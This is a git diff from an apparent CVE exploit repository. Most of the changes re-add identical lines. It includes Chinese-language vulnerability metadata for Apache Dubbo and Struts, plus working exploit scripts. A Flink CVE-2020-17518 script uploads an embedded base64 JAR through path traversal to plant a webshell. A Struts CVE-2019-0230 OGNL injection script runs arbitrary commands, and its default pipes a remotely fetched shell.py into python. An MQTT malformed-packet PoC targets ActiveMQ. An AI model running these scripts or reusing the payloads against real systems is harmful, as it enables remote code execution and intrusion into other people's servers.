+ 每个Apache Dubbo服务器都会设置一个序列化id,告诉客户端它正在使用哪个序列化协议。但是对于 2.7.8 或 2.6.9 之前的 Dubbo 版本,攻击者可以通过篡改字节序码标志(即不遵循服务器的指令)来选择提供程序将使用的序列化 ID。这意味着,如果弱反序列化程序(如 Kryo 和 FST)以某种方式在代码范围内(例如,如果 Kryo 在某种程度上是依赖项的一部分),则未经身份验证的远程攻击者可以告诉提供程序使用弱反序列化程序,然后继续利用它。
+ scope-of-influence:
+ Dubbo 2.5.0 - 2.6.9
+ Dubbo 2.7.0 - 2.7.8
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25641
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-25641
+ cwe-id: CWE-502
+ cnvd-id: None
+ kve-id: None
 tags: cve2021, Apache Dubbo
\ No newline at end of file
diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml
index 1ba752b3..c37c98d4 100644
--- a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml
+++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml
@@ -1,20 +1,20 @@
-id: CVE-2021-43297
-source: https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297
-info:
- name: Dubbo是一个高性能优秀的服务框架。
- severity: CRITICAL
- description: |
- Dubbo是一个高性能优秀的服务框架。CVE-2021-43297中,在Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发远程代码执行。
- scope-of-influence:
- Dubbo Hessian-Lite ≤ 3.2.11
- reference:
- - https://help.aliyun.com/document_detail/390193.html
- - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2021-43297
- cwe-id: CWE-502
- cnvd-id: None
- kve-id: None
+id: CVE-2021-43297
+source: https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297
+info:
+ name: Dubbo是一个高性能优秀的服务框架。
+ severity: CRITICAL
+ description: |
+ Dubbo是一个高性能优秀的服务框架。CVE-2021-43297中,在Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发远程代码执行。
+ scope-of-influence:
+ Dubbo Hessian-Lite ≤ 3.2.11
+ reference:
+ - https://help.aliyun.com/document_detail/390193.html
+ - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-43297
+ cwe-id: CWE-502
+ cnvd-id: None
+ kve-id: None
 tags: cve2021, 数据泄漏
\ No newline at end of file
diff --git a/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py b/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py
old mode 100755
new mode 100644
index c78850f5..d3d4caa3
--- a/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py
+++ b/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py
@@ -1,30 +1,30 @@ -import requests -import base64 -import json -import sys -import cStringIO -#jar_code="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" -def main(): - if len(sys.argv) == 1 or sys.argv[1] == '-h': - print('Usage :python2 flink-getshell.py http://example.com:8081') - exit() - url = sys.argv[1] - jobmanager_config_dir = url + '/jobmanager/config' - upload_jar_url = url + "/jars/upload" - r1 = requests.get(jobmanager_config_dir,verify=False) - #data = json.loads(req.text)[2]['value'] - data = json.loads(r1.text) - for i in data: - #print(i['key']) - if i['key'] == "web.tmpdir": - flink_webdir = i['value'] - print("webdir:%s" % flink_webdir) - file_content = base64.b64decode('UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAAS
BJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA') - files = {'jarfile': ('../../../../../..%s/flink-web-upload/new1.jar' % flink_webdir, cStringIO.StringIO(file_content), 'application/octet-stream')} - r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False) - print('the shell:%s/jars/new1.jar/run?entry-class=Execute&program-args="command"' % url) - -if __name__ == "__main__": - main() - - +import requests +import base64 +import json +import sys +import cStringIO +#jar_code="UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNL
i1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA" +def main(): + if len(sys.argv) == 1 or sys.argv[1] == '-h': + print('Usage :python2 flink-getshell.py http://example.com:8081') + exit() + url = sys.argv[1] + jobmanager_config_dir = url + '/jobmanager/config' + upload_jar_url = url + "/jars/upload" + r1 = requests.get(jobmanager_config_dir,verify=False) + #data = json.loads(req.text)[2]['value'] + data = json.loads(r1.text) + for i in data: + #print(i['key']) + if i['key'] == "web.tmpdir": + flink_webdir = i['value'] + print("webdir:%s" % flink_webdir) + file_content = base64.b64decode('UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAA
AAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA') + files = {'jarfile': ('../../../../../..%s/flink-web-upload/new1.jar' % flink_webdir, cStringIO.StringIO(file_content), 'application/octet-stream')} + r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False) + print('the shell:%s/jars/new1.jar/run?entry-class=Execute&program-args="command"' % url) + +if __name__ == "__main__": + main() + + diff --git a/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py index 1551ebac..856fc4fc 100644 --- a/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py +++ b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py 
@@ -1,163 +1,163 @@ -# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation -# Date: 08/18/2020 -# Exploit Author: West Shepherd -# Vendor Homepage: https://struts.apache.org/download.cgi -# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) -# CVE : CVE-2019-0230 -# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. -# Source(s): -# https://github.com/PrinceFPF/CVE-2019-0230 -# https://cwiki.apache.org/confluence/display/WW/S2-059 -# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 - -# !/usr/bin/python -from sys import argv, exit, stdout, stderr -import argparse -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning -import logging - - -class Exploit: - def __init__( - self, - target='', - redirect=False, - proxy_address='' - ): - requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - self.target = target - self.session = requests.session() - self.redirect = redirect - self.timeout = 0.5 - self.proxies = { - 'http': 'http://%s' % proxy_address, - 'https': 'http://%s' % proxy_address - } \ - if proxy_address is not None \ - and proxy_address != '' else {} - self.query_params = {} - self.form_values = {} - self.cookies = {} - boundary = "---------------------------735323031399963166993862150" - self.headers = { - 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, - 'Accept': '*/*', - 'Connection': 'close' - } - payload = "%{(#nike='multipart/form-data')." \ - "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ - "(#_memberAccess?(#_memberAccess=#dm):" \ - -"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." -\ - -"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." -\ - "(#ognlUtil.getExcludedPackageNames().clear())." \ - "(#ognlUtil.getExcludedClasses().clear())." \ - "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." 
\ - -"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." -\ - -"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ - "(#p=new -java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ - -"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." -\ - -"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." -\ - "(#ros.flush())}" - - self.payload = "--%s\r\nContent-Disposition: form-data; -name=\"foo\"; " \ - "filename=\"%s\0b\"\r\nContent-Type: -text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( - boundary, payload, boundary - ) - - def do_get(self, url, params=None, data=None): - return self.session.get( - url=url, - verify=False, - allow_redirects=self.redirect, - headers=self.headers, - cookies=self.cookies, - proxies=self.proxies, - data=data, - params=params - ) - - def do_post(self, url, data=None, params=None): - return self.session.post( - url=url, - data=data, - verify=False, - allow_redirects=self.redirect, - headers=self.headers, - cookies=self.cookies, - proxies=self.proxies, - params=params - ) - - def debug(self): - try: - import http.client as http_client - except ImportError: - import httplib as http_client - http_client.HTTPConnection.debuglevel = 1 - logging.basicConfig() - logging.getLogger().setLevel(logging.DEBUG) - requests_log = logging.getLogger("requests.packages.urllib3") - requests_log.setLevel(logging.DEBUG) - requests_log.propagate = True - return self - - def send_payload(self, command='curl --insecure -sv -https://10.10.10.10/shell.py|python -'): - url = self.target - stdout.write('sending payload to %s payload %s' % (url, command)) - resp = self.do_post(url=url, params=self.query_params, -data=self.payload.replace('{COMMAND}', command)) - return resp - - -if __name__ == '__main__': - parser = argparse.ArgumentParser(add_help=True, - description='CVE-2020-0230 Struts -2 exploit') - try: - parser.add_argument('-target', 
action='store', help='Target -address: http(s)://target.com/index.action') - parser.add_argument('-command', action='store', - help='Command to execute: touch /tmp/pwn') - parser.add_argument('-debug', action='store', default=False, -help='Enable debugging: False') - parser.add_argument('-proxy', action='store', default='', -help='Enable proxy: 10.10.10.10:8080') - - if len(argv) == 1: - parser.print_help() - exit(1) - options = parser.parse_args() - - exp = Exploit( - proxy_address=options.proxy, - target=options.target - ) - - if options.debug: - exp.debug() - stdout.write('target %s debug %s proxy %s\n' % ( - options.target, options.debug, options.proxy - )) - - result = exp.send_payload(command=options.command) - stdout.write('Response: %d\n' % result.status_code) - - except Exception as error: - +# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation +# Date: 08/18/2020 +# Exploit Author: West Shepherd +# Vendor Homepage: https://struts.apache.org/download.cgi +# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) +# CVE : CVE-2019-0230 +# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. 
+# Source(s): +# https://github.com/PrinceFPF/CVE-2019-0230 +# https://cwiki.apache.org/confluence/display/WW/S2-059 +# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 + +# !/usr/bin/python +from sys import argv, exit, stdout, stderr +import argparse +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import logging + + +class Exploit: + def __init__( + self, + target='', + redirect=False, + proxy_address='' + ): + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + self.target = target + self.session = requests.session() + self.redirect = redirect + self.timeout = 0.5 + self.proxies = { + 'http': 'http://%s' % proxy_address, + 'https': 'http://%s' % proxy_address + } \ + if proxy_address is not None \ + and proxy_address != '' else {} + self.query_params = {} + self.form_values = {} + self.cookies = {} + boundary = "---------------------------735323031399963166993862150" + self.headers = { + 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, + 'Accept': '*/*', + 'Connection': 'close' + } + payload = "%{(#nike='multipart/form-data')." \ + "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ + "(#_memberAccess?(#_memberAccess=#dm):" \ + +"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." +\ + +"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." +\ + "(#ognlUtil.getExcludedPackageNames().clear())." \ + "(#ognlUtil.getExcludedClasses().clear())." \ + "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \ + +"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." +\ + +"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ + "(#p=new +java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ + +"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." 
+\ + +"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." +\ + "(#ros.flush())}" + + self.payload = "--%s\r\nContent-Disposition: form-data; +name=\"foo\"; " \ + "filename=\"%s\0b\"\r\nContent-Type: +text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( + boundary, payload, boundary + ) + + def do_get(self, url, params=None, data=None): + return self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=data, + params=params + ) + + def do_post(self, url, data=None, params=None): + return self.session.post( + url=url, + data=data, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params + ) + + def debug(self): + try: + import http.client as http_client + except ImportError: + import httplib as http_client + http_client.HTTPConnection.debuglevel = 1 + logging.basicConfig() + logging.getLogger().setLevel(logging.DEBUG) + requests_log = logging.getLogger("requests.packages.urllib3") + requests_log.setLevel(logging.DEBUG) + requests_log.propagate = True + return self + + def send_payload(self, command='curl --insecure -sv +https://10.10.10.10/shell.py|python -'): + url = self.target + stdout.write('sending payload to %s payload %s' % (url, command)) + resp = self.do_post(url=url, params=self.query_params, +data=self.payload.replace('{COMMAND}', command)) + return resp + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(add_help=True, + description='CVE-2020-0230 Struts +2 exploit') + try: + parser.add_argument('-target', action='store', help='Target +address: http(s)://target.com/index.action') + parser.add_argument('-command', action='store', + help='Command to execute: touch /tmp/pwn') + parser.add_argument('-debug', action='store', default=False, +help='Enable debugging: False') + parser.add_argument('-proxy', action='store', default='', 
+help='Enable proxy: 10.10.10.10:8080') + + if len(argv) == 1: + parser.print_help() + exit(1) + options = parser.parse_args() + + exp = Exploit( + proxy_address=options.proxy, + target=options.target + ) + + if options.debug: + exp.debug() + stdout.write('target %s debug %s proxy %s\n' % ( + options.target, options.debug, options.proxy + )) + + result = exp.send_payload(command=options.command) + stdout.write('Response: %d\n' % result.status_code) + + except Exception as error: + stderr.write('error in main %s' % str(error)) \ No newline at end of file diff --git a/cve/apache-Struts/2019/CVE-2019-0230/README.md b/cve/apache-Struts/2019/CVE-2019-0230/README.md index b9a4f94c..94d8caa3 100644 --- a/cve/apache-Struts/2019/CVE-2019-0230/README.md +++ b/cve/apache-Struts/2019/CVE-2019-0230/README.md 
@@ -1,21 +1,21 @@ -# Apache Struts 2.5.20 - Double OGNL evaluation -Exploit Author: Lucas Souza https://lsass.io -Vendor Homepage: https://apache.org/ -Version: 2.4.49 -Tested on: 2.4.49 -CVE : CVE-2019-0230 -Credits: Ash Daulton and the cPanel Security Team -# Usage -``` -python CVE-2019-0230.py + --target : Target address --command : Command to execute --debug : Enable debugging --proxy : Enable proxy -``` -# reference -http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html -http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html -https://cwiki.apache.org/confluence/display/ww/s2-059 -https://launchpad.support.sap.com/#/notes/2982840 +# Apache Struts 2.5.20 - Double OGNL evaluation +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2019-0230 +Credits: Ash Daulton and the cPanel Security Team +# Usage +``` +python CVE-2019-0230.py + +-target : Target address +-command : Command to execute +-debug : Enable debugging +-proxy : Enable proxy +``` +# reference +http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html +http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html +https://cwiki.apache.org/confluence/display/ww/s2-059 +https://launchpad.support.sap.com/#/notes/2982840 https://www.oracle.com/security-alerts/cpujan2021.html \ No newline at end of file diff --git a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml index e1e4a6e8..819ec7b5 100644 --- a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml +++ b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml 
@@ -1,24 +1,24 @@ -id: CVE-2019-0230 -source: https://www.exploit-db.com/exploits/49068 -info: - name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。 - severity: critical - description: - Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 - scope-of-influence: - Struts 2.0.0 - Struts 2.5.20 - reference: - - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html - - https://cwiki.apache.org/confluence/display/ww/s2-059 - - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html - - https://launchpad.support.sap.com/#/notes/2982840 - - https://www.oracle.com/security-alerts/cpuApr2021.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-0230 - cwe-id: CWE-1321 - cnvd-id: None - kve-id: None - tags: - - 远程命令执行 +id: CVE-2019-0230 +source: https://www.exploit-db.com/exploits/49068 +info: + name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。 + severity: critical + description: + Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 + scope-of-influence: + Struts 2.0.0 - Struts 2.5.20 + reference: + - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html + - https://cwiki.apache.org/confluence/display/ww/s2-059 + - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html + - https://launchpad.support.sap.com/#/notes/2982840 + - https://www.oracle.com/security-alerts/cpuApr2021.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-0230 + cwe-id: CWE-1321 + cnvd-id: None + kve-id: None + tags: + - 远程命令执行 diff --git a/cve/apache-activemq/2020/CVE-2020-13932/poc.py b/cve/apache-activemq/2020/CVE-2020-13932/poc.py index d85d0d51..62973a9b 100644 
--- a/cve/apache-activemq/2020/CVE-2020-13932/poc.py +++ b/cve/apache-activemq/2020/CVE-2020-13932/poc.py @@ -1,22 +1,22 @@ -import time -import socket -from scapy.contrib.mqtt import * -from scapy.compat import raw - -brokerIP = "" # input the server IP here -brokerPort = 1883 # The default listen port of MQTT is 1883 -clientid = "" #Malformed Clientid -malformedTopic = "" # Malformed Topic - -if __name__ == '__main__': - connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid) - # Malformed Connect Message - subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1) - # Malformed Subscribe Message - conn = socket.socket() - conn.connect((brokerIP, brokerPort)) - conn.send(raw(connMessage)) - time.sleep(1) - conn.send(raw(subMessage)) - input() # Keep the MQTT Connection - conn.close() +import time +import socket +from scapy.contrib.mqtt import * +from scapy.compat import raw + +brokerIP = "" # input the server IP here +brokerPort = 1883 # The default listen port of MQTT is 1883 +clientid = "" #Malformed Clientid +malformedTopic = "" # Malformed Topic + +if __name__ == '__main__': + connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid) + # Malformed Connect Message + subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1) + # Malformed Subscribe Message + conn = socket.socket() + conn.connect((brokerIP, brokerPort)) + conn.send(raw(connMessage)) + time.sleep(1) + conn.send(raw(subMessage)) + input() # Keep the MQTT Connection + conn.close() diff --git a/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml b/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml index 1fa394da..07b1b496 100644 --- a/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml +++ b/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml 
